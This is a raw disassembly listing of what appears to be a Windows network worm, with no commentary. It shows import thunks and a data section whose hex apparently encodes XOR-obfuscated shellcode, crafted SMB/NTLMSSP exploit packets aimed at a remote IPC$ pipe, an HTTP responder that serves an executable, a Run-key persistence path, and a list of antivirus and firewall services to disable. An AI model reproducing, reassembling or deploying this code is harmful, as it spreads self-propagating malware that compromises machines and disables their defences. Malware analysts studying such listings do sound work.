loc_41E46D ; --------------------------------------------------------------------------- loc_41E46C: ; CODE XREF: sub_41E441+2Fj inc edi loc_41E46D: ; CODE XREF: sub_41E441+29j cmp byte ptr [edi], 20h jz short loc_41E46C jmp short loc_41E490 ; --------------------------------------------------------------------------- loc_41E474: ; CODE XREF: sub_41E441+3Ej inc edi loc_41E475: ; CODE XREF: sub_41E441+Fj movsx eax, byte ptr [edi] or eax, eax jz short loc_41E481 cmp eax, 20h jnz short loc_41E474 loc_41E481: ; CODE XREF: sub_41E441+39j jmp short loc_41E484 ; --------------------------------------------------------------------------- loc_41E483: ; CODE XREF: sub_41E441+4Dj inc edi loc_41E484: ; CODE XREF: sub_41E441:loc_41E481j movsx eax, byte ptr [edi] or eax, eax jz short loc_41E490 cmp eax, 20h jz short loc_41E483 loc_41E490: ; CODE XREF: sub_41E441+24j ; sub_41E441+31j ... push 0 call sub_41E521 push 1 push edi push 0 push eax call sub_41E239 pop edi leave retn sub_41E441 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_41E4A5 proc near ; CODE XREF: sub_41D569+8p var_FFC = dword ptr -0FFCh pop ecx loc_41E4A6: ; CODE XREF: sub_41E4A5+14j sub esp, 1000h sub eax, 1000h test [esp+0FFCh+var_FFC], eax cmp eax, 1000h jnb short loc_41E4A6 sub esp, eax test [esp+0FFCh+var_FFC], eax jmp ecx sub_41E4A5 endp ; sp-analysis failed ; --------------------------------------------------------------------------- align 4 db 0 ; =============== S U B R O U T I N E ======================================= sub_41E4C5 proc near ; CODE XREF: sub_41E239+15p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov edx, [esp+arg_4] xor eax, eax mov ecx, 0FFFFFFFFh xchg edi, edx repne scasb neg ecx lea ecx, [ecx-1] mov eax, [esp+arg_4] xchg eax, esi mov edi, [esp+arg_0] rep movsb xchg eax, esi xchg edx, edi mov eax, [esp+arg_0] retn 8 sub_41E4C5 endp ; --------------------------------------------------------------------------- align 10h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E4F1 proc near ; CODE XREF: .data:0041D380p jmp dword ptr ds:loc_4052A5+3 sub_41E4F1 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E4FD proc near ; CODE XREF: sub_41E441+5p jmp dword ptr ds:loc_4052AB+1 sub_41E4FD endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E509 proc near ; CODE XREF: sub_41E239+91p jmp dword ptr ds:loc_4052B0 sub_41E509 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E515 proc near ; CODE XREF: .data:0041D388p jmp dword ptr ds:loc_4052B0+4 sub_41E515 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E521 proc near ; CODE XREF: sub_41E441+51p jmp dword ptr ds:loc_4052B5+3 sub_41E521 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E52D proc near ; CODE XREF: .data:0041D3B8p ; .data:0041D45Cp ... jmp dword ptr ds:loc_4052BC sub_41E52D endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E539 proc near ; CODE XREF: .data:0041DC10p jmp dword ptr ds:loc_4052BC+4 sub_41E539 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E545 proc near ; CODE XREF: sub_41DEC4+4p jmp dword ptr ds:loc_4052C1+3 sub_41E545 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E551 proc near ; CODE XREF: sub_41D118+1Ep jmp dword ptr ds:loc_4052C8 sub_41E551 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E55D proc near ; CODE XREF: .data:0041D356p ; .data:0041E206p jmp dword ptr ds:loc_4052C8+4 sub_41E55D endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E569 proc near ; CODE XREF: .data:0041D2FAp jmp dword ptr ds:loc_4052CD+3 sub_41E569 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E575 proc near ; CODE XREF: .data:0041D395p ; .data:0041DC28p jmp dword ptr ds:loc_4052D4 sub_41E575 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E581 proc near ; CODE XREF: .data:0041D372p jmp dword ptr ds:loc_4052D4+4 sub_41E581 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E58D proc near ; CODE XREF: .data:0041D3B2p jmp dword ptr ds:loc_4052D9+3 sub_41E58D endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E599 proc near ; CODE XREF: sub_41CE5B+13p jmp dword ptr ds:loc_4052DE+2 sub_41E599 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E5A5 proc near ; CODE XREF: .data:0041D3D0p ; sub_41D569+17Ep jmp dword ptr ds:loc_4052E4 sub_41E5A5 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E5B1 proc near ; CODE XREF: .data:0041D2EEp ; .data:0041D328p ... jmp dword ptr ds:loc_4052E5+3 sub_41E5B1 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E5BD proc near ; CODE XREF: sub_41D569+72p jmp dword ptr ds:loc_4052EA+2 sub_41E5BD endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E5C9 proc near ; CODE XREF: sub_41D569+BBp ; sub_41D569+D9p ... jmp dword ptr ds:loc_4052ED+3 sub_41E5C9 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E5D5 proc near ; CODE XREF: .data:0041D456p ; .data:0041DF1Ep ... jmp dword ptr ds:loc_4052F4 sub_41E5D5 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E5E1 proc near ; CODE XREF: sub_41DF6A+185p jmp dword ptr ds:loc_4052F4+4 sub_41E5E1 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E5ED proc near ; CODE XREF: sub_41E239+108p jmp dword ptr ds:loc_405302+2 sub_41E5ED endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E5F9 proc near ; CODE XREF: sub_41E239+60p jmp dword ptr ds:loc_405308 sub_41E5F9 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E605 proc near ; CODE XREF: sub_41E239+12Bp jmp dword ptr ds:sub_40530C sub_41E605 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E611 proc near ; CODE XREF: sub_41E239+113p jmp dword ptr ds:loc_40530F+1 sub_41E611 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E61D proc near ; CODE XREF: sub_41E239+11Cp jmp dword ptr ds:loc_405311+3 sub_41E61D endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E629 proc near ; CODE XREF: .data:0041E20Fp jmp dword ptr ds:loc_405316+2 sub_41E629 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E635 proc near ; CODE XREF: sub_41E239+87p jmp dword ptr ds:loc_40531B+1 sub_41E635 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E641 proc near ; CODE XREF: .data:0041E21Cp jmp dword ptr ds:loc_405320 sub_41E641 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E64D proc near ; CODE XREF: .data:0041E22Fp jmp dword ptr ds:loc_405323+1 sub_41E64D endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E659 proc near ; CODE XREF: sub_41DF6A+C5p ; sub_41DF6A+205p jmp dword ptr ds:loc_40532F+1 sub_41E659 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E665 proc near ; CODE XREF: sub_41DF6A+6Fp ; sub_41DF6A+82p jmp dword ptr ds:loc_405334 sub_41E665 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E671 proc near ; CODE XREF: sub_41DF6A+BFp jmp dword ptr ds:loc_405337+1 sub_41E671 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E67D proc near ; CODE XREF: sub_41DF6A+2Cp jmp dword ptr ds:loc_405339+3 sub_41E67D endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E689 proc near ; CODE XREF: sub_41DF6A+59p jmp dword ptr ds:loc_40533E+2 sub_41E689 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E695 proc near ; CODE XREF: sub_41DF6A+1F5p jmp dword ptr ds:loc_405343+1 sub_41E695 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E6A1 proc near ; CODE XREF: sub_41D13D+21p jmp dword ptr ds:loc_405346+2 sub_41E6A1 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E6AD proc near ; CODE XREF: sub_41D13D+4Bp ; sub_41D1A8+40p ... jmp dword ptr ds:loc_405349+3 sub_41E6AD endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E6B9 proc near ; CODE XREF: sub_41D1A8+16p ; sub_41DF6A+1D1p jmp dword ptr ds:sub_405350 sub_41E6B9 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E6C5 proc near ; CODE XREF: sub_41D1A8+36p jmp dword ptr ds:loc_405353+1 sub_41E6C5 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E6D1 proc near ; CODE XREF: sub_41D13D+41p jmp dword ptr ds:loc_405358 sub_41E6D1 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E6DD proc near ; CODE XREF: sub_41D07D+15p jmp dword ptr ds:loc_405364 sub_41E6DD endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E6E9 proc near ; CODE XREF: .data:0041D043p jmp dword ptr ds:loc_405367+1 sub_41E6E9 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E6F5 proc near ; CODE XREF: .data:0041DC52p ; .data:0041DC8Cp ... jmp dword ptr ds:loc_40536C sub_41E6F5 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E701 proc near ; CODE XREF: .data:0041D06Ep jmp dword ptr ds:loc_405370 sub_41E701 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E70D proc near ; CODE XREF: sub_41D569+B2p ; sub_41D569+D0p ... jmp dword ptr ds:loc_405370+4 sub_41E70D endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E719 proc near ; CODE XREF: sub_41D569+16Dp ; sub_41D569+2E4p ... jmp dword ptr ds:loc_405376+2 sub_41E719 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E725 proc near ; CODE XREF: .data:0041CFC4p jmp dword ptr ds:loc_40537C sub_41E725 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E731 proc near ; CODE XREF: sub_41D468:loc_41D491p ; sub_41D468:loc_41D4EBp ... jmp dword ptr ds:loc_40537F+1 sub_41E731 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E73D proc near ; CODE XREF: .data:0041CF7Dp ; .data:0041CF97p ... jmp dword ptr ds:loc_405384 sub_41E73D endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E749 proc near ; CODE XREF: .data:0041D283p ; sub_41D468+F4p ... jmp dword ptr ds:loc_405387+1 sub_41E749 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E755 proc near ; CODE XREF: .data:0041DC16p jmp dword ptr ds:loc_40538C sub_41E755 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E761 proc near ; CODE XREF: sub_41D07D+6Bp ; sub_41D07D+8Ep ... jmp dword ptr ds:loc_405390 sub_41E761 endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E76D proc near ; CODE XREF: sub_41E441+17p jmp dword ptr ds:loc_405390+4 sub_41E76D endp ; --------------------------------------------------------------------------- db 90h dd 90h db 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_41E779 proc near ; CODE XREF: .data:0041D234p ; .data:0041D250p jmp dword ptr ds:loc_405398 sub_41E779 endp ; --------------------------------------------------------------------------- db 90h dd 90h, 17h dup(0) dd 40300000h, 40311000h, 800000h, 22h dup(0) dd 5000h, 0 dd 34303400h, 746F4E20h, 756F6620h, 2900646Eh, 0D960413Ah dd 170A0705h, 27251F1Bh, 2AC9C5ACh, 0DF7F5F3Ch, 746845EBh dd 2F3A7074h, 3732312Fh, 2 dup(3030302Eh), 3130302Eh, 3030303Ah dd 662F3038h, 0AEAE6273h, 335DAE62h, 0A0B966C9h, 5758D01h dd 68AFE8Bh, 575993Ch, 2C068A46h, 99344630h, 0E2470788h dd 0E80AEBEDh, 0FFFFFFDAh, 99999999h, 41E41499h, 0C9994671h dd 0C999C999h, 712FE414h, 99C9994Eh, 0F3C999C9h, 0C999F19Dh dd 99C99989h, 0C999F1C9h, 999CC999h, 0C999F3C9h, 99988B71h dd 67C999C9h, 10F0E3F3h, 9998931Ch, 0F3C999C9h, 414C999h dd 0C999989Bh, 71CAC999h, 99C99963h, 0BC999C9h, 10A7C196h dd 0C999671Ch, 0C999C999h, 9666611Ah, 0C999091Dh, 0C999C999h dd 0C8C850B2h, 1498F3C8h, 71C941DCh, 99C99936h, 4EC999C9h dd 1291C0A4h, 0ED599249h, 0C959B2EFh, 14C9C9C9h, 0CBCA2FC4h dd 0C9990C71h, 0C999C999h, 21E424FFh, 0C7ED5992h, 99F1CDCDh dd 9CC999C9h, 2C66C999h, 0C9999893h, 71C9C999h, 99C999E3h dd 0FBC999C9h, 6683B8B0h, 9998932Ch, 66C999C9h, 0C999672Ch dd 0C999C999h, 0C9991471h, 0C999C999h, 0E7C29C9Bh, 99672C66h dd 99C999C9h, 99E771C9h, 99C999C9h, 31F1AC9h, 149CF3A4h dd 99989B04h, 0CAC999C9h, 0C999F571h, 0C999C999h, 7126F434h dd 71C998F3h, 99C999F9h, 77C999C9h, 14865973h, 496624D4h dd 0C999CB71h, 0C999C999h, 0EF133BF9h, 0A13729F9h, 0DE9AED9Eh dd 9E5F6072h, 5AF8C999h, 0C999A9C1h, 2 dup(0C999C999h) dd 0B7FBEAFFh, 99FCE1FCh, 4 dup(99C999C9h), 0F934C7C9h dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah dd 10F885BDh, 9998971Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh dd 0C212C999h, 85C21295h, 0C2128212h, 0FDC65A91h, 0C6EAFAh dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0) dd 0FEFF0000h, 0 dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h dd 0 dd 53FFA400h, 73424Dh, 18000000h, 0C807h, 3 dup(0) dd 0FEFFh, 0FF0C0010h, 400A400h, 0A11h, 0 dd 2000h, 0D4000000h, 69800000h, 4C544E00h, 5053534Dh dd 100h, 8829700h, 0E0h, 3 dup(0) dd 570000h, 6E0069h, 6F0064h, 730077h, 320020h, 300030h dd 200030h, 310032h, 350039h, 570000h, 6E0069h, 6F0064h dd 730077h, 320020h, 300030h, 200030h, 2E0035h, 30h, 0 dd 0FFDA0000h, 73424D53h, 0 dd 0C80718h, 3 dup(0) dd 0FEFF00h, 0C002008h, 0DA00FFh, 0A1104h, 0 dd 570000h, 0 dd 800000D4h, 544E009Fh, 53534D4Ch, 30050h, 10000h, 460001h dd 0 dd 470000h, 0 dd 400000h, 0 dd 400000h, 60000h, 400006h, 100000h, 470010h, 8A150000h dd 48E088h, 44004Fh, 6A198100h, 49E4F27Ah, 30AF281Ch, 67107425h dd 69005753h, 64006E00h, 77006F00h, 20007300h, 30003200h dd 30003000h, 32002000h, 39003100h, 3500h, 69005700h, 64006E00h dd 77006F00h, 20007300h, 30003200h, 30003000h, 35002000h dd 30002E00h, 2 dup(0) dd 53FF5C00h, 75424Dh, 18000000h, 0C807h, 3 dup(0) dd 800FEFFh, 0FF040030h, 8005C00h, 31000100h, 5C0000h dd 31005Ch, 320039h, 31002Eh, 380036h, 31002Eh, 32002Eh dd 300031h, 49005Ch, 430050h, 24h, 3F3F3F3Fh, 3Fh, 0FF640000h dd 0A2424D53h, 0 dd 0C80718h, 3 dup(0) dd 4DC08h, 18004008h, 0DEDE00FFh, 16000E00h, 0 dd 9F000000h, 201h, 2 dup(0) dd 3000000h, 1000000h, 40000000h, 2000000h, 3000000h, 5C000011h dd 73006C00h, 72006100h, 63007000h, 0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) dd 4DC0800h, 500800h, 48000010h, 0 dd 4, 2 dup(0) dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h dd 5C0045h, 0 dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0 dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh dd 0 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0C000000h dd 4D53FFF4h, 2542h, 7180000h, 0C8h, 2 dup(0) dd 0DC080000h, 60080004h, 1000h, 0CA0h, 400h, 2 dup(0) dd 540000h, 540CA0h, 260002h, 0CB14000h, 50005C10h, 50004900h dd 5C004500h, 0 dd 500h, 1003h, 0CA000h, 100h, 0C8800h, 9000000h, 3EC00h dd 0 dd 3EC00h, 14950000h, 30040h, 707C0000h, 10040h, 0 dd 10000h, 0 dd 10000h, 0 dd 10000h, 0 dd 10000h, 0 dd 10000h, 0 dd 10000h, 0 dd 10000h, 0 dd 707C0000h, 10040h, 0 dd 10000h, 0 dd 707C0000h, 10040h, 0 dd 10000h, 0 dd 707C0000h, 10040h, 0 dd 10000h, 0 dd 85780000h, 5BAB0013h, 0E9A6h, 0FFF81000h, 2F424D53h dd 0 dd 0C80718h, 3 dup(0) dd 0FEFF08h, 0E006008h, 0DEDE00FFh, 4000h, 0FFFF0000h dd 8FFFFh, 10B8h, 4010B8h, 0 dd 5EE10B9h, 10010000h, 0B8000000h, 1000010h, 0C000000h dd 20h, 0AD000900h, 0Dh, 0AD000000h, 0Dh, 0D80F0000h, 424D53FFh dd 25h, 0C8071800h, 3 dup(0) dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0) dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h dd 5C0045h, 0 dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0 dd 40A89A00h, 100h, 0 dd 100h, 0 dd 100h, 0 dd 100h, 0 dd 100h, 0 dd 100h, 0 dd 100h, 0 dd 100h, 0 dd 40A89A00h, 100h, 0 dd 100h, 0 dd 40A89A00h, 100h, 0 dd 100h, 0 dd 40A89A00h, 100h, 0 dd 100h, 10h dup(0) dd 460000h, 101h, 0Dh dup(0) dd 15123C00h, 275h, 0Dh dup(0) dd 1C123C00h, 75h, 0Eh dup(0) dd 0EC816600h, 0E4FF071Ch, 100h, 404CF700h, 404CE900h dd 200h, 180h, 404CF700h, 404CE000h, 100h, 180h, 404CF700h dd 404CCF00h, 200h, 80h, 0 dd 404CB500h, 0 dd 404C9C00h, 2 dup(0) dd 404C8C00h, 2 dup(0) dd 404C8200h, 2 dup(0) dd 404C6900h, 2 dup(0) dd 404C5000h, 2 dup(0) dd 404C4300h, 2 dup(0) dd 404C3300h, 100h, 0 dd 404C2C00h, 100h, 4049F800h, 404C2400h, 100h, 0 dd 404C1900h, 2 dup(0) dd 404C1200h, 100h, 0 dd 404C0C00h, 100h, 0 dd 404C0300h, 100h, 0 dd 404BFC00h, 100h, 0 dd 404BF300h, 100h, 0 dd 404BEC00h, 100h, 0 dd 404BE500h, 100h, 0 dd 404BDD00h, 100h, 0 dd 404BD700h, 100h, 404A0800h, 404BD000h, 100h, 0 dd 404BC800h, 100h, 0 dd 404BC100h, 100h, 0 dd 404BBB00h, 100h, 0 dd 404BB200h, 100h, 404A1800h, 404BAD00h, 100h, 0 dd 404BA800h, 100h, 404A2800h, 404BA200h, 100h, 0 dd 524F5700h, 6669004Dh, 6F530063h, 61777466h, 4D5C6572h dd 6F726369h, 74666F73h, 6E69575Ch, 73776F64h, 6B005C00h dd 6469706Ch, 706C6B00h, 6C6B0066h, 76006669h, 74616473h dd 746E61h, 6F6D7376h, 6D6B006Eh, 78627378h, 786D6B00h dd 7369646Eh, 786D6B00h, 736469h, 66786D6Bh, 6D6B0077h dd 6C696678h, 6D6B0065h, 67666378h, 786D6B00h, 676962h dd 61786D6Bh, 746E6567h, 786D5500h, 676643h, 41786D55h dd 746E6567h, 786D5500h, 5500554Ch, 6F50786Dh, 6D53006Ch dd 72655363h, 65636976h, 69667300h, 7265746Ch, 736E6C00h dd 317766h, 7074754Fh, 4674736Fh, 77657269h, 6C6C61h, 72616873h dd 63616465h, 73736563h, 41634D00h, 20656566h, 6D617246h dd 726F7765h, 6553206Bh, 63697672h, 65440065h, 74636574h dd 6420726Fh, 664F2065h, 65636966h, 6E616353h, 5A00544Eh dd 41656E6Fh, 6D72616Ch, 6E615000h, 41206164h, 7669746Eh dd 73757269h, 726F4E00h, 206E6F74h, 69746E41h, 75726976h dd 65532073h, 63697672h, 614B0065h, 72657073h, 20796B73h dd 69746E41h, 6361482Dh, 2E72656Bh, 6B6E6Ch, 656E6F5Ah dd 62614C20h, 6C432073h, 746E6569h, 6F4D4100h, 6F74696Eh dd 6F4C0072h, 27206B6Fh, 5320276Eh, 706F74h, 54464F53h dd 45524157h, 63694D5Ch, 6F736F72h, 575C7466h, 6F646E69h dd 435C7377h, 65727275h, 6556746Eh, 6F697372h, 75525C6Eh dd 78006Eh, 253A7325h, 31002F75h, 312E3239h, 252E3836h dd 75252E75h, 32373100h, 2E75252Eh, 252E7525h, 30310075h dd 2E75252Eh, 252E7525h, 6EB0075h, 5C0006EBh, 5C73255Ch dd 24637069h, 2E752500h, 252E7525h, 75252E75h, 54544800h dd 2E312F50h, 30322031h, 4B4F2030h, 0A0D0A0Dh, 43000A0Dh dd 65746E6Fh, 4C2D746Eh, 74676E65h, 25203A68h, 0D0A0D75h dd 5448000Ah, 312F5054h, 3220312Eh, 4F203030h, 430A0D4Bh dd 65746E6Fh, 542D746Eh, 3A657079h, 70706120h, 6163696Ch dd 6E6F6974h, 652D782Fh, 632D6578h, 72706D6Fh, 65737365h dd 0A0D64h, 787878h, 544547h, 300050h, 6 dup(0) dd 50F400h, 2 dup(0) dd 57F400h, 524C00h, 513800h, 2 dup(0) dd 583C00h, 529000h, 514400h, 2 dup(0) dd 584C00h, 529C00h, 515000h, 2 dup(0) dd 585C00h, 52A800h, 51AC00h, 2 dup(0) dd 58C000h, 530400h, 51D800h, 2 dup(0) dd 58F000h, 533000h, 520C00h, 2 dup(0) dd 592C00h, 536400h, 1Ah dup(0) dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h dd 543400h, 543C00h, 544800h, 2 dup(0) dd 545400h, 2 dup(0) dd 547000h, 2 dup(0) dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h dd 55BC00h, 55C800h, 55D800h, 2 dup(0) dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h dd 565400h, 566800h, 567800h, 2 dup(0) dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0) dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h dd 57DC00h, 57E800h, 2 dup(0) dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h dd 543400h, 543C00h, 544800h, 2 dup(0) dd 545400h, 2 dup(0) dd 547000h, 2 dup(0) dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h dd 55BC00h, 55C800h, 55D800h, 2 dup(0) dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h dd 565400h, 566800h, 567800h, 2 dup(0) dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0) dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h dd 57DC00h, 57E800h, 0 dd 57003000h, 74534153h, 75747261h, 70h, 61003500h, 70656363h dd 74h, 62003600h, 646E69h, 63003700h, 65736F6Ch, 6B636F73h dd 7465h, 63003800h, 656E6E6Fh, 7463h, 67003B00h, 6F687465h dd 79627473h, 656D616Eh, 67003C00h, 6F687465h, 616E7473h dd 656Dh, 68004600h, 736E6F74h, 69004700h, 5F74656Eh, 72646461h dd 69004900h, 5F74656Eh, 616F746Eh, 6C004B00h, 65747369h dd 6Eh, 72004F00h, 766365h, 73005500h, 646E65h, 73005900h dd 64747568h, 6E776Fh, 73005A00h, 656B636Fh, 74h, 49008100h dd 7265746Eh, 4774656Eh, 6F437465h, 63656E6Eh, 53646574h dd 65746174h, 53004F00h, 74654748h, 63657053h, 466C6169h dd 65646C6Fh, 74615072h, 4168h, 45008200h, 54746978h, 61657268h dd 64h, 4700CA00h, 6F437465h, 6E616D6Dh, 6E694C64h, 4165h dd 4700DE00h, 75437465h, 6E657272h, 6F725074h, 73736563h dd 6449h, 4700F800h, 69467465h, 6953656Ch, 657Ah, 47010C00h dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 43001B00h dd 65736F6Ch, 